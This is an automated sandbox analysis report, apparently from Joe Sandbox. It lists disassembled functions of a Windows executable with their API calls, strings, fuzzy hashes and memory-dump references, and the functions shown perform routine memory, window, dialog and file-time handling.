                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 41e0306cb15c4a7f81a6894ed77cc7acb98fc3439a0864023267d00df8b9e27b
                                                                                                                                        • Instruction ID: eb688398070296049c184aec2fb3dd97c61e50a3962d3eff581f0e6a20042fb1
                                                                                                                                        • Opcode Fuzzy Hash: 41e0306cb15c4a7f81a6894ed77cc7acb98fc3439a0864023267d00df8b9e27b
                                                                                                                                        • Instruction Fuzzy Hash: 54512671A083018FC748CF19D48059AF7E1FF88314F058A2EE899A7741DB34E959CBD6
                                                                                                                                        Function 007A2B3A Relevance: .1, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                                                        • Instruction ID: a9dca132f73f399d6e67e780e6988969345bcc3f7b9228cc735b7634137f497a
                                                                                                                                        • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                                                        • Instruction Fuzzy Hash: E031D2B16047499FCB14DF2CD85526EBBD0FB96700F004A2DE4DAD7742D678E90ACBA2
                                                                                                                                        Function 00795E96 Relevance: .1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2e665cd07ed16e2e138ae615e27f4802a60580580e342cec0992a3acb9dce809
                                                                                                                                        • Instruction ID: 2563d4c2b839f203661efdb581ba30dff91831bbc924d47448d1e68ff97d058e
                                                                                                                                        • Opcode Fuzzy Hash: 2e665cd07ed16e2e138ae615e27f4802a60580580e342cec0992a3acb9dce809
                                                                                                                                        • Instruction Fuzzy Hash: 9D21DA72A201755BCF09CF2DFCA583A7355A786301786C12FEA468B2D1C63DED25CBA0
                                                                                                                                        Function 007B958D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 007B95D1
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9189
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B919B
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91AD
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91BF
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91D1
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91E3
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91F5
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9207
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9219
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B922B
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B923D
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B924F
                                                                                                                                          • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9261
                                                                                                                                        • _free.LIBCMT ref: 007B95C6
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B95E8
                                                                                                                                        • _free.LIBCMT ref: 007B95FD
                                                                                                                                        • _free.LIBCMT ref: 007B9608
                                                                                                                                        • _free.LIBCMT ref: 007B962A
                                                                                                                                        • _free.LIBCMT ref: 007B963D
                                                                                                                                        • _free.LIBCMT ref: 007B964B
                                                                                                                                        • _free.LIBCMT ref: 007B9656
                                                                                                                                        • _free.LIBCMT ref: 007B968E
                                                                                                                                        • _free.LIBCMT ref: 007B9695
                                                                                                                                        • _free.LIBCMT ref: 007B96B2
                                                                                                                                        • _free.LIBCMT ref: 007B96CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                        • Opcode ID: 24492690555b31bff5d622eb22d0f37c8621445efb2198d7cb793bab6fe1bd93
                                                                                                                                        • Instruction ID: d4d5b82662e487f393d9adadf7f9178ea7749f81f2e22a54f1dec080aeb4b04e
                                                                                                                                        • Opcode Fuzzy Hash: 24492690555b31bff5d622eb22d0f37c8621445efb2198d7cb793bab6fe1bd93
                                                                                                                                        • Instruction Fuzzy Hash: 5F312A71604705EFEF21AB38D849BD677E9AF00324F208429E6A9D7191DE39BC908B10
                                                                                                                                        Function 007AB8BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindow.USER32(?,00000005), ref: 007AB8DD
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 007AB90C
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 007AB92A
                                                                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007AB941
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007AB954
                                                                                                                                          • Part of subcall function 007A8B22: GetDC.USER32(00000000), ref: 007A8B2E
                                                                                                                                          • Part of subcall function 007A8B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A8B3D
                                                                                                                                          • Part of subcall function 007A8B22: ReleaseDC.USER32(00000000,00000000), ref: 007A8B4B
                                                                                                                                          • Part of subcall function 007A8ADF: GetDC.USER32(00000000), ref: 007A8AEB
                                                                                                                                          • Part of subcall function 007A8ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 007A8AFA
                                                                                                                                          • Part of subcall function 007A8ADF: ReleaseDC.USER32(00000000,00000000), ref: 007A8B08
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007AB97B
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007AB982
                                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 007AB98B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                                                        • String ID: STATIC
                                                                                                                                        • API String ID: 1444658586-1882779555
                                                                                                                                        • Opcode ID: db547afbeaadfc55d9722da085e4293f94f94b144aab4d5081dbf65e284ef08c
                                                                                                                                        • Instruction ID: 3ab56211a2751963fd24c5f9a32a7c4fd7d6532b4f086b4b07f51951b56d8d0d
                                                                                                                                        • Opcode Fuzzy Hash: db547afbeaadfc55d9722da085e4293f94f94b144aab4d5081dbf65e284ef08c
                                                                                                                                        • Instruction Fuzzy Hash: 1B2108B2540218BBD7216B64DC4AFAF7B2DEF86706F008215FA01A5082CB7C5D0286FA
                                                                                                                                        Function 007B622B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B623F
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B624B
                                                                                                                                        • _free.LIBCMT ref: 007B6256
                                                                                                                                        • _free.LIBCMT ref: 007B6261
                                                                                                                                        • _free.LIBCMT ref: 007B626C
                                                                                                                                        • _free.LIBCMT ref: 007B6277
                                                                                                                                        • _free.LIBCMT ref: 007B6282
                                                                                                                                        • _free.LIBCMT ref: 007B628D
                                                                                                                                        • _free.LIBCMT ref: 007B6298
                                                                                                                                        • _free.LIBCMT ref: 007B62A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 6e539a5e7ffd3f1c8cfef789c87b28b1ec1a944fe9f192dcc85c0962911bc2be
                                                                                                                                        • Instruction ID: 57c2c1fa70d1fb866e79fd93d73190475fa2075edc267c3a864fbb2904ca2622
                                                                                                                                        • Opcode Fuzzy Hash: 6e539a5e7ffd3f1c8cfef789c87b28b1ec1a944fe9f192dcc85c0962911bc2be
                                                                                                                                        • Instruction Fuzzy Hash: E0114476610608EFCF01EF59C946ED93BA5FF04360B5145A5BA888F222DA39EA519F80
                                                                                                                                        Function 007920E6 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                                        • API String ID: 0-2277559157
                                                                                                                                        • Opcode ID: a02344ab6eba03d4b4f1aa36a9f2cc032983fa77288a37347cccdd76d7bbf625
                                                                                                                                        • Instruction ID: 3a8e1ce870bf460656507e386d9a0679497ea98183db8c610671b66c913207fc
                                                                                                                                        • Opcode Fuzzy Hash: a02344ab6eba03d4b4f1aa36a9f2cc032983fa77288a37347cccdd76d7bbf625
                                                                                                                                        • Instruction Fuzzy Hash: 37F14D71604380ABDF15FB74A899BFE779AAF90300F08056DFD85DB283D62C9946C762
                                                                                                                                        Function 007A995F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A99AF
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 007A99DC
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007A99F1
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 007A9A02
                                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 007A9A0B
                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007A9A1F
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007A9A31
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                        • String ID: LICENSEDLG
                                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                                        • Opcode ID: 639ce3fe0747dd79f259b3ea6b1aa807d4e6d25666d8b07b9fd84397fec2673f
                                                                                                                                        • Instruction ID: f5ca6805a174aa76d1f7431c6ff782cf2ee9cc29a277e192225c2f683b147f4e
                                                                                                                                        • Opcode Fuzzy Hash: 639ce3fe0747dd79f259b3ea6b1aa807d4e6d25666d8b07b9fd84397fec2673f
                                                                                                                                        • Instruction Fuzzy Hash: DF210732201108BBD6116B65DD89E7B3B6DEBCBB45F00C118F744A64A1CB6EAC12D67B
                                                                                                                                        Function 007B6552 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                        • String ID: N,{$N,{$N,{
                                                                                                                                        • API String ID: 1036877536-4109897969
                                                                                                                                        • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                                                        • Instruction ID: 7ee82c352d0cc3ffec4526f3c250644f6459eed2e832411f6adc165d873ecede
                                                                                                                                        • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                                                                                                                        • Instruction Fuzzy Hash: E0A16A72900386DFEB21CF28C891BEEBBE5EF55318F1841ADE6959B282D63C9D41C750
                                                                                                                                        Function 0079922D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00799232
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00799255
                                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00799274
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        • _swprintf.LIBCMT ref: 00799310
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00799385
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007993C1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                        • String ID: rtmp%d
                                                                                                                                        • API String ID: 2111052971-3303766350
                                                                                                                                        • Opcode ID: ab4dd2452c8e242e9e88269e263c745ffc36ce2f24c3df6ed5c8cf2b3912c982
                                                                                                                                        • Instruction ID: 9666fba76982c026c79926d90573574dd3327013b135494ad66a28d712eed1da
                                                                                                                                        • Opcode Fuzzy Hash: ab4dd2452c8e242e9e88269e263c745ffc36ce2f24c3df6ed5c8cf2b3912c982
                                                                                                                                        • Instruction Fuzzy Hash: 74415071911158E6EF21EFA4ED89EDE777CAF45340F0440A9F605E3042EA399B858FA0
                                                                                                                                        Function 007A7EE5 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,007A8705,?), ref: 007A7FBA
                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 007A7FDB
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 007A8002
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                        • API String ID: 4094277203-4209811716
                                                                                                                                        • Opcode ID: 676eddd44c00fc5b4d0c7935e75d0901891136fcfdc61b5d98573cf0aaaff249
                                                                                                                                        • Instruction ID: 9c1c798ef396d545fa67dadfcf597427c450c168762c3cef5d74d4e3017066bf
                                                                                                                                        • Opcode Fuzzy Hash: 676eddd44c00fc5b4d0c7935e75d0901891136fcfdc61b5d98573cf0aaaff249
                                                                                                                                        • Instruction Fuzzy Hash: 37311A72109315BFD328AB209C0AFABB75CDF93320F14421EF510961C2EB7C9909C7A6
                                                                                                                                        Function 007A7D96 Relevance: 12.1, APIs: 8, Instructions: 135windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 007A7DAF
                                                                                                                                        • GetTickCount.KERNEL32 ref: 007A7DCD
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A7DE3
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A7DF7
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007A7E02
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007A7E0D
                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 007A7EBD
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007A7EC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4150546248-0
                                                                                                                                        • Opcode ID: e9ca219565b635244da3c1a88d7be57610104cda99f203ce62dd1e756ca573ac
                                                                                                                                        • Instruction ID: f5240034a7ba1fa6e31db4f27d0af35b838870a61e73c5ad830eb7bc767865a2
                                                                                                                                        • Opcode Fuzzy Hash: e9ca219565b635244da3c1a88d7be57610104cda99f203ce62dd1e756ca573ac
                                                                                                                                        • Instruction Fuzzy Hash: 14418AB1208306AFC718DF65CC88D2BBBE9EF8A705B00496DB546C7211DB38EC45CB62
                                                                                                                                        Function 0079FE20 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __aulldiv.LIBCMT ref: 0079FE33
                                                                                                                                          • Part of subcall function 0079A8E0: GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0079FE5C
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0079FE6E
                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0079FE7B
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0079FE91
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0079FE9D
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0079FED3
                                                                                                                                        • __aullrem.LIBCMT ref: 0079FF5D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1247370737-0
                                                                                                                                        • Opcode ID: 0a82f352a3d818f901137a6f24d8d48b1c750d2db644e987544015eee9663663
